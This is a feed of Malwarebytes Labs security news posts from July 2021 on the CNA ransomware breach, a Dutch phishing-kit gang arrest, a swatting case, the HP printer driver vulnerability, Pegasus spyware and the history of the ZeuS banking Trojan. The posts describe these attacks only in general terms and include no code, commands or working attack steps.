  • Enable tamper protection to prevent attackers from uninstalling your security software (this is a feature in our Nebula product)

AvosLocker is detected without specific signatures by Malwarebytes’ anti-ransomware technology:

Indicators of Compromise

43b7a60c0ef8b4af001f45a0c57410b7374b1d75a6811e0dfc86e4d60f503856

The post AvosLocker enters the ransomware scene, asks for partners appeared first on Malwarebytes Labs.

Categories: Malware Bytes

CNA legal filings lift the curtain on a Phoenix CryptoLocker ransomware attack

Malware Bytes Security - Fri, 07/23/2021 - 2:06pm

Two months after fully restoring its systems, CNA Financial, the leading US insurance company that was attacked by a group using Phoenix CryptoLocker ransomware, issued a legal notice of an information security incident to the Consumer Protection Bureau in New Hampshire.

You may recall that Phoenix CryptoLocker—or simply Phoenix—is a ransomware family that is believed to be linked to the criminal group Evil Corp. CNA’s network was compromised in March 2021. This notice has given every reader an insight into how the attack happened, what CNA did, and what they continue to do for those whose data was affected by this ransomware-attack-slash-data-breach.

Phoenix posed as a browser update

According to CNA, one of its employees was able to download and execute a fake browser update after visiting a legitimate website. The notice didn’t specify if this legitimate website is the official website of the browser this employee is using. The employee not having elevated privileges didn’t stop the threat actors from following through with the attack. Instead, they used “additional malicious activity” to get credentials they need to move forward. Attackers often use privilege escalation exploits to increase their access rights, or tools like Mimikatz that can extract passwords from a computer’s memory.

“With elevated privileges, the Threat Actor moved laterally within the environment to conduct reconnaissance and establish persistence onto certain systems within the environment. Between March 5 and March 20, 2021, the threat actor conducted reconnaissance within CNA’s IT environment using legitimate tools and legitimate credentials to avoid detection and to establish persistence,” the company revealed.

Using legitimate administration tools and accounts in this way to explore a network and spread malware is know as “living off the land”. It allows attackers to keep a low profile as they go about their business because their activity doesn’t look out of place and their tools often aren’t detected by security software by default.

At least 15,000 systems, including devices connected to CNA’s network via VPN, were instantly affected after the threat actors detonated the ransomware.

Data stolen but untouched

CNA Prior to executing Phoenix, the threat actors were able to steal important and sensitive information affecting 75,349 individuals. A significant number of them were names of current and former employees plus their dependents and their Social Security Numbers (SSNs). On the other hand, a small number of those affected had their birth dates, benefit enrolment, and medical information.

As to how these were stolen, the threat actors “copied, compressed and staged unstructured data obtained from file shares found on three CNA virtual servers; and used MEGAsync, a legitimate tool, to copy some of the unstructured data (“Exported Data”) from the CNA environment directly into the threat actor’s cloud-based account (the “Mega Account”) hosted by Mega NZ Limited (“Mega”).”

According to CNA’s notice, it was able to work with the FBI and the “Cloud-Storage Platform” (presumably this means Mega) to “take control of the account and quickly recover CNA’s data”. CNA believes that the data was held so that the attackers could threaten to leak it, a common tactic in modern ransomware attacks. The company reports that its forensic experts could find no evidence that the data was “viewed or otherwise shared”; therefore, it was never accessed by the threat actors themselves to either be sold, traded, or used for other nefarious purposes.

Recovering from ransomware

This information coming to light two months after the attack shows that recovering from ransomware is rarely quick and easy. Aside from the obvious technical problems that have to be overcome to get a business working again, the root causes must be discovered and addressed, and there may be legal and regulatory hurdles to overcome.

In a recent episode of our Lock and Code podcast, host David Ruiz spoke to Ski Kacoroski—a system administrator with the Northshore School District in Washington state—about the immediate reaction, the planned response, and the long road to recovery from a ransomware attack. You can listen to it below, or on Apple PodcastsSpotify, and Google Podcasts.

This video cannot be displayed because your Functional Cookies are currently disabled.

To enable them, please visit our privacy policy and search for the Cookies section. Select “Click Here” to open the Privacy Preference Center and select “Functional Cookies” in the menu. You can switch the tab back to “Active” or disable by moving the tab to “Inactive.” Click “Save Settings.”

The post CNA legal filings lift the curtain on a Phoenix CryptoLocker ransomware attack appeared first on Malwarebytes Labs.

Categories: Malware Bytes

Busted! Fraud-as-a-Service gang that sold 2FA-proof phishing arrested

Malware Bytes Security - Fri, 07/23/2021 - 1:57pm

The Dutch police announced that they arrested two Dutch citizens, aged 24 and 15, for developing and selling phishing panels. The police also searched the house of another suspect, an 18 year old who was not arrested.

The people behind this illegal business called themselves the Fraud Family and were active on Telegram to sell their panels to interested parties. For cybercriminals that lacked the technical knowledge or means, the Fraud Family also offered to host the phishing sites and backend panels.

Group-IB

During their investigation the police received help from the threat intelligence firm Group-IB that specializes in investigating and preventing cybercrimes. Group-IB published a blogpost that goes into detail about the activities of the Fraud Family and the different panels that were developed by them. If you are interested in more details about the phishing methods, their blog is well worth the read.

2FA bypass

The developers of these phishing kits made sure their customers, fellow cybercriminals, could bypass 2FA. The crooks who use this phishing infrastructure get access to a web panel that interacts, in real time, with the phishing site. When victims submit their banking credentials, the phishing site sends them to the web panel where the fraudster is waiting. This one actually notifies the scammers that a new victim is online. The scammers will lie waiting because the scammers need to react fast enough so they can then request the additional information that will help them to gain access to the bank accounts, two factor authentication tokens, and personal identifiable information (PII). While the phishing site is waiting for further instructions from the attackers, the unsuspecting victim is looking at a “Please wait…” screen.

The lures

The phishers themselves were free to set up methods to get their victims to the phishing sites that were designed to look exactly like the real, legitimate websites. Well-known tactics include phishing emails and texts that ask for urgent, but usually small payments as not to raise suspicion. Another is to act as an interested buyer on an online platform and ask for a 1 cent payment to verify that the seller is not a scammer.

The amount the scammers ask for is not relevant for the end-result as the scammers can enter any number they like on the real banking site while they wait for the victim to provide them with the necessary details.

Delay takedowns

Any successful phishing site will eventually get reported and taken down, or blocked. But the time that such sites stay alive can be prolonged by using certain precautions. The more important part of the service are the panels, and the Fraud Family offered a “plug and play” phishing service that kept the framework under control and prevented it from leaking to the public. By using anti-bot tools developers can prevent crawlers, automated analysis tools, and services like VirusTotal and URLScan from accessing the phishing sites, as well as make it harder for researchers to find them.

Mitigation

There are a few methods for victims to avoid phishing scams that could lead to emptied bank accounts. These are a few pointers to keep in mind:

  • Be mindful when providing payment details even if you are only making a small payment. Behind the scenes someone could be altering the number.
  • Always go to your banking site directly. Do not use a link provided in a mail or text. Save a shortcut in your browser if you find typing to cumbersome or if you want to avoid typo squatting.
  • Double check the payment request with the party that sent it to you by using another method of communication.
  • If someone, even if you think it’s one of your loved ones, sends you a text to tell you they have a new phone number, call them on the number you have on record to verify.
  • Banks and other reputable organizations do not use URL shorteners when they send you a link.
  • Check the information of the website in the address bar. The green padlock is needed but not enough.
  • If you think you may be a victim of a phishing attack, quickly communicate with your bank, the organization being impersonated by the fraudsters, and the police. They can issue an alert which may help others and maybe limit the damage.
  • Use a password manager. A password manager will not fill out your details if the website’s domain does not fit what it has on record.

For banks:

Do better 2FA than sending verification codes that can be passed along from victims to scammers. Dutch research last year showed that the customers of some banks fall victim more often than others and not because those banks are bigger. Instead, it is because they use less reliable 2FA methods. It’s a lot easier for a scammer to ask their victim for a 4 digit code than it is to get to show them a QR code. And this whole type of scam falls apart if the bank login procedure relies on a hardware key.

Stay safe, everyone!

The post Busted! Fraud-as-a-Service gang that sold 2FA-proof phishing arrested appeared first on Malwarebytes Labs.

Categories: Malware Bytes

5 years for swatter who caused a man’s death for a Twitter handle

Malware Bytes Security - Thu, 07/22/2021 - 1:32pm

Doxing (or doxxing) is in the news again, for an absolutely shocking story that ended with a man’s death caused by a swatting attack. If you don’t know what doxxing or swatting are, don’t worry. We’ll explain it all.

The doxing 101

Doxing someone is a technique going back to the 90s. Back then, everyone was typically very anonymous online and stripping that anonymity away was a powerful weapon.

I’d argue it really came to prominence in mainstream terms during the massive boom in social media. Bad people very quickly realised huge amounts of personal data was lurking on sites such as MySpace, just out of reach. Once obtained, chaos and mayhem were the inevitable end result. In that time period, roughly between 2007 to 2010, law enforcement was generally struggling to keep up. If you ended up in Internet trouble with trolls and / or doxers, you were essentially on your own.

Not a great position to be in.

The Swatting 101

Prank calls to emergency services have been around forever. The difference here is swatting calls come with the threat of injury or death. The technique involves calling emergency services and telling the operator someone is about to commit suicide, or a family is at risk from an intruder, or perhaps they’ve witnessed someone brandishing a weapon. Whatever it takes to get law enforcement to turn up expecting trouble.

The name swatting comes from the US-based Special Weapons and Tactics teams (SWAT) used to deal with violent and dangerous situations. Swatting became a go-to tactic in gaming circles. Aggrieved gamers would get busy doxing after fallouts over online matches, with inevitable consequences. As streaming is now a default for many gamers, more and more examples of swatting are caught on camera. Everyone from 12 year olds to people gaming in business premises are at risk.

The problem is so bad that law enforcement frequently create tactics to help mitigate the threat to innocent people. Real world pranking can range from mildly amusing to incredibly annoying, but the trouble is people can and do take it to extremes. Swatting is, as you’d guess, a “prank” at the absolute extreme end.

Jail time after man dies of swatting-induced heart attack

What happened here is an awful combination of threats, harassment, social engineering and swatting. A desire to obtain “rare” social media handles led individuals to pressure victims into handing them over. A lot of it sounds like the usual thing you’d expect from doxing: pizza delivered to the door, that kind of thing.

However, it quickly escalated into all manner of malicious tactics designed to steal away desirable usernames. Bomb threats, SIM swap attacks, and even fake dating meetings which involved unsuspecting dates walking into one victim’s home as if they were expected.

Eventually, one victim’s address was posted into a Discord chat. The inevitable swat attack took place, and they died of a heart attack after crawling under a fence at the behest of police officers.

60 months in prison is the end result for 18-year-old Tennessee man Shane Sonderman, one of the people involved in what the judge described as these “almost unspeakable” crimes, and the person who posted the victim’s address to Discord. Sonderman’s sentence is the maximum the law allows.

Steering clear of swatting

Protecting yourself from swatting isn’t exactly easy, and a lot depends on whether your local law enforcement regularly deploy with weaponry. There are certainly ways to minimise the threat in relation to personal information exposure. However, much of that is down to warding off social engineering attacks and good OPSEC. All the same, it’ll help in all situations including potential swat attempts so it’s win-win.

This story is a shocking reminder that far too many people out there are willing to casually endanger lives over nothing more than videogames, social media accounts, or even just plain old boredom. We need to do everything we can to ensure our risk from such attacks is as minimal as it can possibly be.

The post 5 years for swatter who caused a man’s death for a Twitter handle appeared first on Malwarebytes Labs.

Categories: Malware Bytes

Millions of Windows machines affected by ancient printer vulnerability

Malware Bytes Security - Thu, 07/22/2021 - 8:24am

A very serious security flaw in immensely popular printer drivers has been disclosed and it could affect many millions of Windows systems. The printer driver was issued by HP, but it’s also in use by Samsung and Xerox. All the affected printers are laser printers.

The most surprising about this find is probably that the vulnerability apparently has existed since 2005 and was only found 16 years later.

Publicly disclosed computer security flaws are listed in the Common Vulnerabilities and Exposures (CVE) database. The vulnerability has been listed as CVE-2021-3438 and it is a potential buffer overflow in the software drivers that can be abused to achieve an escalation of privilege.

Vulnerabilities also often receive a severity rating on the CVSS scale. This vulnerability received an 8.8 out of 10 rating on the CVSS scale, which puts it in the high-severity range.

What is a buffer overflow?

A buffer overflow is a type of software vulnerability that exists when an area of memory within a software application reaches an address boundary and writes into an adjacent memory region. Buffer overflows can be used to overwrite useful data, cause network crashes, or replace memory with arbitrary code that the instruction pointer later executes.

In this case the buffer overflow can be used to get administrator permissions on the system as a normal user. So any attacker that wants to use this vulnerability will first need some kind of access to the system. But once they have access they can use the vulnerability to get permissions to install programs, view, change, or delete data, and encrypt files. The vulnerable driver is loaded when the systems boots, so the printer doesn’t even have to be connected to the system anymore for this vulnerability to work. Even worse, the user may not even be aware of the presence of the vulnerable driver.

Discovery

The vulnerability was discovered more or less by coincidence by researchers at SentinelLabs when they were configuring a brand new HP printer. In their post about the vulnerability they state:

“Many of these drivers come preloaded on devices or get silently dropped when installing some innocuous legitimate software bundle and their presence is entirely unknown to the users. These OEM drivers are often decades old and coded without concern for their potential impact on the overall integrity of those systems.”

After the discovery on Feb 18, 2021  the researchers engaged in an “open-ended process of vulnerability discovery.” Which means they spoke to vendors and manufacturers to makes sure the vulnerability had a patch before it could be exploited in the wild. So far as we know, this vulnerability has not been seen abused in the wild yet. But after disclosure and publication of the patches, which will no doubt be reverse engineered, this can happen anytime soon.

Mitigation

HP offers an update to patch the vulnerability. The immense list of affected products can be found at the HP site about the vulnerability. To obtain the update you can go to the HP Software site and search for your printer model, even if that is a Samsung model.

If there is an update for your printer you will see something similar to this after clicking on the Software, Drivers and Firmware button.

From there your can use the Download button to obtain the update and install it. If you are looking for the update because you have an affected Xerox laser printer you can visit the Xerox Support portal where it is available for download.

Stay safe, everyone!

The post Millions of Windows machines affected by ancient printer vulnerability appeared first on Malwarebytes Labs.

Categories: Malware Bytes

Pegasus spyware has been here for years. We must stop ignoring it

Malware Bytes Security - Thu, 07/22/2021 - 7:10am

On July 18, a group of 17 newspaper and media organizations—aided by Amnesty International’s Security Lab and the research group Citizen Lab—revealed that one of the world’s most advanced and viciously invasive spyware tools had been used to hack, or attempt to hack, into 37 mobile phones owned by human rights activists, journalists, political dissidents, and business executives.

The spyware, called Pegasus and developed by the Israeli company NSO Group, is reportedly instrumental to several governments’ oppressive surveillance campaigns against their own citizens and residents, and, while NSO Group has repeatedly denied allegations that it complicitly sells Pegasus to human right abusers, it is difficult to reconcile exactly how the zero-click spyware program—which non-consensually and invisibly steals emails, text messages, photos, videos, locations, passwords, and social media activity—is at the same time a tool that can, in its very use, respect the rights of those around the world to speak freely, associate safely, and live privately.

Pegasus is spyware, and spyware is not made to respect privacy. It erodes it.

What may be most upsetting about Sunday’s bombshell reporting is that the cybersecurity community has known about Pegasus for years. Antivirus vendors detect it. Digital forensics labs know how to catch it. And between 2016 and 2018, more than 1,000 IP addresses were found to be associated with it.

With tools like Pegasus that can be abused on a global scale, we take on too big a risk. When weaponized by authoritarian governments, surveillance chills free speech, scares away dissent, and robs an innocent public of a life lived unwatched, for no crime committed other than speaking truth to power, conducting public health research, or simply loving another person.

It enables abuses like the mobile phone hack of Hatice Cengiz, former fiancée of murdered Washington Post columnist Jamal Khoshoggi. After the world learned that her phone was hacked, she wrote:

“I am deeply shocked that I have been targeted while I was in such pain waiting to find out what had happened to Jamal. This was the worst time of my life and yet the killers were spying on me. They have no shame. They must be brought to justice.”

Pegasus in theory

According to NSO Group, its main spyware program is a beneficial tool for investigating and preventing terrorist attacks and maintaining the safety of the public. In answering questions from the group of 17 media organizations—which published their findings under the name “The Pegasus Project”—NSO Group said:

“Simply put, NSO Group is on a life-saving mission, and the company will faithfully execute this mission undeterred, despite any and all continued attempts to discredit it on false grounds.”

After The Pegasus Project published its initial findings on Sunday, NSO Group’s chief executive Shalev Hulio spoke with The Washington Post about concerns he had about how his company’s software has been used against journalists and human rights activists.

“The company cares about journalists and activists and civil society in general,” Hulio said. “We understand that in some circumstances our customers might misuse the system and, in some cases like we reported in [NSO’s] Transparency and Responsibility Report, we have shut down systems for customers who have misused the system.”

Hulio told The Washington Post that his company had terminated the contracts of two customers because of allegations of human rights abuses, but, according to the paper, he refused to disclose which accounts were closed.

NSO Group’s explanations are just one half of the story, though, because, in reporting out Sunday’s revelations, The Pegasus Project also asked potentially responsible governments why they used Pegasus to hack the mobile phones of dissidents and reporters. The governments in question either denied using Pegasus at all—like Rwanda’s foreign affairs minister said—or they claimed that any surveillance carried out by their governments was lawful—like Hungarian Prime Minister Viktor Orban’s office did.

Similarly, the government of India rebuffed any allegations that it wrongfully used Pegasus to conduct surveillance. Any interception of messages, the government said, is approved at several levels of the government in accordance with several laws.

“In India, there is a well established procedure through which lawful interception of electronic communication is carried out in order for the purpose of national security, particularly on the occurrence of any public emergency or in the interest of public safety, by agencies at the Centre and States,” the government said. “The requests for these lawful interception of electronic communication are made as per relevant rules under the provisions of section 5(2) of Indian Telegraph Act, 1885 and section 69 of the Information Technology (Amendment) Act, 2000”

The twin stories that NSO Group and its clients tell, then, is that Pegasus is a necessary tool to maintain safety, and that the use of Pegasus is legal within a country’s own surveillance regime.

NSO Group has also said that its tool is increasingly necessary in an era when end-to-end encryption is widely available to criminals.

“Terror organizations, drug cartels, human traffickers, pedophile rings and other criminal syndicates today exploit off-the-shelf encryption capabilities offered by mobile messaging and communications applications,” NSO Group told The Pegasus Project. “These technologies provide criminals and their networks a safe haven, allowing them to ‘go dark’ and avoid detection, communicating through impenetrable mobile messaging systems. Law enforcement and counterterrorism state agencies around the world have struggled to keep up.”

This trend can be true—end-to-end encryption is more widely available today than ever before, offered in several consumer apps on both Android and iOS devices—while also overblown. As Malwarebytes Labs has written before, the “going dark” problem is often overstated, and the solution to that problem, to make “safe backdoors,” is also technologically impossible.

Importantly, though, if Pegasus was actually a critical tool to stop crime, it could be proven. In practice, however, The Pegasus Project found that the targets of Pegasus are not “terror organizations, drug cartels, human traffickers, pedophile rings” or “other criminal syndicates,” but rather reporters, scientists, romantic partners, and potentially heads of state

Pegasus in practice

On Sunday and in the days following, The Pegasus Project revealed the broad cast of victims it believes have been targeted with Pegasus spyware.

In its reporting, The Pegasus Project relied on a list of 50,000 phone numbers obtained by the French journalism nonprofit Forbidden Stories. The reporters believe the 50,000 phone numbers are a list of phone numbers that have been targeted using Pegasus spyware. The list also includes timestamps for each phone number entry, which the reporters believe shows when a phone was potentially first targeted by a Pegasus operator.

In the investigation, the reporters contacted dozens of the individuals who the listed phone numbers belonged to, eventually obtaining 67 mobile devices that they believed had been targeted by the spyware.

The 67 devices were first analyzed by Amnesty International’s Security Lab, which looked for traces of Pegasus spyware and for malicious text messages that, if clicked, were known to exploit device zero-day vulnerabilities to install the Pegasus spyware and hack into phones. Amnesty International’s work was separately verified by Citizen Lab, a research institution at the University of Toronto that focuses on technology and human rights.

In the investigation, The Pegasus Project found signs of successful or attempted hacking by Pegasus spyware on 37 devices. The remaining 30 devices produced inconclusive results.

The list of phone numbers—which NSO Group denied is a list of Pegasus targets—included 14 politicians, including three presidents, 10 prime ministers (three current and seven former), and one king.

The three presidents are France’s Emmanuel Macron, Iraq’s Barham Salih, and South Africa’s Cyril Ramaphosa. None of the heads of state offered their mobile devices to The Pegasus Project, making it impossible to know if the devices had been hacked or had received malicious text messages that could result in a hack.

The possible use of Pegasus against presidents, prime ministers, and princesses is just that: Possible. But remember that The Pegasus Project found evidence of hacking or attempted hacking on 37 of the 67 mobile devices it tested.

From the facts reported so far, the use of Pegasus against those individuals bears no marking of anti-terrorist, pro-security, or counterintelligence work at all.

For instance, why was Pegasus used to hack into the phone of reporter Khadija Ismayilova, whose investigative work has revealed corruption within Azerbaijan’s ruling family?

Why was Pegasus silently implanted onto the iPhone 11 of Claude Magnin, Paris resident and  wife of the political activist Naama Asfari, who was jailed and allegedly tortured in Morocco?

Why was Pegasus used to hack into the phones of the wife and separate fiancée of Washington Post columnist and critic of the Saudi Arabian government Jamal Khoshoggi, who, according to the Biden Administration, was murdered and dismembered with approval from Saudi Arabia’s Crown Prince?

And why did a Pegasus operator send malicious texts to one scientist and two nonprofit directors who actively supported a banal soda tax in Mexico? Or why did a Pegasus operator similarly send text messages to Mexican journalist Raphael Cabrera that, if clicked, could have reportedly resulted in a Pegasus infection of his iPhone 6?

This is not security work. This is surveillance.

A dangerous industry

Pegasus is not new. The company behind it launched in 2010, and it reportedly gained its first overseas customer just one year later. For years, Citizen Lab has been tracking the spread of Pegasus, searching for government clients and tracking down mobile devices that were hacked by the spyware. Back in 2016, the group’s investigations helped spur MacOS updates to fix severe vulnerabilities that could have been exploited by Pegasus. In 2018, Citizen Lab also identified 45 countries that were potentially relying on Pegasus to conduct surveillance.

More recently, NSO Group’s activities spilled into American news when Facebook blamed the Israeli company for exploiting a vulnerability in WhatsApp in 2019. Facebook-owned WhatsApp later sued NSO Group for allegedly using this vulnerability to allow Pegasus users to hack 1,400 devices. The lawsuit is still proceeding, and it has gained the support of Microsoft, Google, Cisco, and VMWare.

We have known about these problems for years. We can no longer turn a blind eye to this type of abuse. Two years ago, a group of cybersecurity vendors, digital rights activists, and domestic violence support networks came together to launch the Coalition Against Stalkerware, recognizing the interdisciplinary need to protect users from the threat of intimate partner surveillance.

We hope the same energy can be captured today.

After learning about the findings from The Pegasus Project, former NSA defense contractor and surveillance whistleblower Edward Snowden warned that spyware is not a small problem. It is, he said, everywhere, and it needs to be stopped.

“When I look at this, what the Pegasus Project has revealed is a sector where the only product are infection vectors, right? They don’t—they’re not security products,” Snowden said. “They’re not providing any kind of protection, any kind of prophylactic.”

“They don’t make vaccines. The only thing they sell is the virus.”

The post Pegasus spyware has been here for years. We must stop ignoring it appeared first on Malwarebytes Labs.

Categories: Malware Bytes

The life and death of the ZeuS Trojan

Malware Bytes Security - Wed, 07/21/2021 - 1:15pm

Whether you’ve read up on Greek mythology or you’re simply a big fan of Marvel comics, the name “Zeus” should be familiar to you. In the context of cybercrime though, ZeuS (aka the Zbot Trojan) is a once-prolific malware that could easily be described as one of a handful of information stealers ahead of its time. Collectively, this malware and its variants infected millions of systems and stole billions of dollars worldwide.

ZeuS was primarily created to be a financial or banking Trojan, otherwise known as crimeware. But, as you’ll see, the extent of its information stealing ability could easily go beyond covertly pilfering financial information, making it a real threat to individuals and organizations of all sizes.

First spotted in-the-wild in 2007, the earliest known version of the ZeuS Trojan was caught stealing sensitive information from systems owned by the United States Department of Transformation. It was believed that ZeuS originated in Eastern Europe. ZeuS affiliates focused their efforts away from corporations and large banks, going after small- to medium-sized organizations, including towns and churches, according to the Federal Bureau of Investigation (FBI).

ZeuS usually arrives via phishing campaigns, spam campaigns, and drive-by downloads. However, this is easy to change and anyone motivated to conduct financial fraud can easily change who they target and how they want their ZeuS to be delivered. Victims have been infected by ZeuS variants via instant messengers (IM), messaging features in social media platforms, and even a pay-per-install (PPI) service—a way to distribute ads to users that a ZeuS user employed for their campaigns.

Once a machine gets infected, ZeuS immediately steals information from web browsers and Windows’ protected storage (PStore), such as banking or financial information and stored account credentials, respectively. All stolen data are siphoned off via a command & control (C&C) server.

Furthermore, any system infected with ZeuS also becomes a bot in a botnet. A kind of illegal Cloud computing platform that can be rented out to other criminals. These bots were also used to remotely update the ZeuS variants residing in them.

To date, there are 545 versions of the ZeuS Trojan, according to a website called ZeuSMuseum.com.

The FBI’s illustration of a ZeuS cyber theft ring works. (Source: FBI) How mighty is the ZeuS Trojan?

A ZeuS Trojan toolkit can be fashioned to do a number of things both for the fledgling and adept fraudster.

ZeuS lurks inside infected machines as it stealthily monitors the websites users visit. It recognizes when a user is on a banking website, for example, and then records keystrokes when the user logs into the site. Because of this, fraudsters can easily log back into that banking account using the recorded keystrokes.

Some variants of ZeuS also affect mobile devices that run Android, Symbian, and Blackberry. ZeuS is the first information stealing malware that steals Mobile Transaction Authentication Numbers (mTANs), a type of two-factor authentication (2FA) method that banks use when you want to perform transactions. An mTAN, also called SMS TAN code, is usually a 6-digit number that is unique per transaction and is sent via SMS.

ZeuS steals information in a number of ways, including: Stealing user keystrokes; collecting the text users enter into web forms; taking screenshots whenever the mouse is clicked; so-called man-in-the-browser (MiTB) attacks that add new elements to web forms asking for things like social security numbers or bank PINs.

As to what, exactly, ZeuS steals, here is non-exhaustive a list provided by the SecureWorks security researchers:

  • Data submitted in HTTP forms
  • Account credentials stored in the Windows Protected Storage
  • Client-side X.509 public key infrastructure (PKI) certificates
  • FTP and POP account credentials
  • HTTP and Flash cookies

ZeuS is also capable of re-encrypting itself every time it infects a system, making each infection “unique” and therefore harder to detect.

Many researchers attribute ZeuS’s ability to stay under the radar for long periods of time as the main reason why it became the most sought-after info-stealer kit in the underground market during its time. It’s likely that ZeuS infected millions of computers, with many victims not realizing that their sensitive data had fallen into the hands of criminals and that their computer was part of a botnet.

The ZeuS developers also put a lot of effort into protecting their malware. According to SecureWorks, ZeuS 1.3.4.x, a privately sold version of the kit, is protected via a hardware-based licensing system. Also known as hardware-locked licensing, this system allows the kit to be installed on only one computer.

The “fall” of ZeuS Trojan

In 2011, the source code for ZeuS 2.0.8.9 was leaked. Some groups or individuals started offering the use of ZeuS botnets on a subscription basis. According to a case study on ZeuS from students at the University of Cambridge, this “maximises earnings by providing the same service to multiple users. For the user of the service, the benefits are in a reduction in the initial financial outlay, while outsourcing the logistical and maintenance requirements, and reducing the risk of failure to achieve results.”

Cybercriminals also began creating their own ZeuS-based information stealers, make ZeuS itself something of a footnote. Citadel, GameOver, Panda Banker, Terdot, Floki, and Sphinx are some of the known ZeuS variants to date.

Before the code leak, it was rumored that the ZeuS creator would be retiring and then selling his code to a competitor called SpyEye, an up-and-coming information stealer that made heads turn for being able to remove ZeuS infections. There had been reports of a code hand-over, yes, further confirming the merging of the two malware, but the ZeuS creator didn’t quit. According to a report from Brian Krebs, the creator merely stopped selling it publicly and started creating “a more robust and private version of Zeus” instead.

In 2013, the FBI charged and arrested Aleksander “Harderman” Panin, a 24-year-old Russian male believed to be the creator of the SpyEye Trojan. That same year, Hamza Bendelladj, a 24-year-old Algerian male, was arrested and charged for developing components of SpyEye, operating botnets infected with SpyEye, and of course, fraud charges.

Is ZeuS dead?

As long as criminals continue to use bits and pieces of its code to create their own malware, ZeuS can’t be considered dead, so much as fading away slowly. However, ZeuS’s purpose, data theft, is making a comeback.

Banking trojans haven’t gone away, but in recent years their activity has been eclipsed by an epidemic of ransomware. Recently though, major ransomware operators have taken to stealing victims’ data before encrypting it, so they can threaten to leak it.

The tactic has been so successful that some ransomware actors claim to be moving away from encrypting files, and focussing entirely on finding and exfiltrating sensitive data from organisations.

In fact, following a devastating attack on Ireland’s public health system, the Conti ransomware gang issued the Health Service Executive (HSE), a free decryption key to unlock all of their affected files, convinced that simply publishing and selling the data they had stolen was leverage enough.

How long I wonder, before information stealers are another thing Biden will be phoning Putin for?

The post The life and death of the ZeuS Trojan appeared first on Malwarebytes Labs.

Categories: Malware Bytes

Pages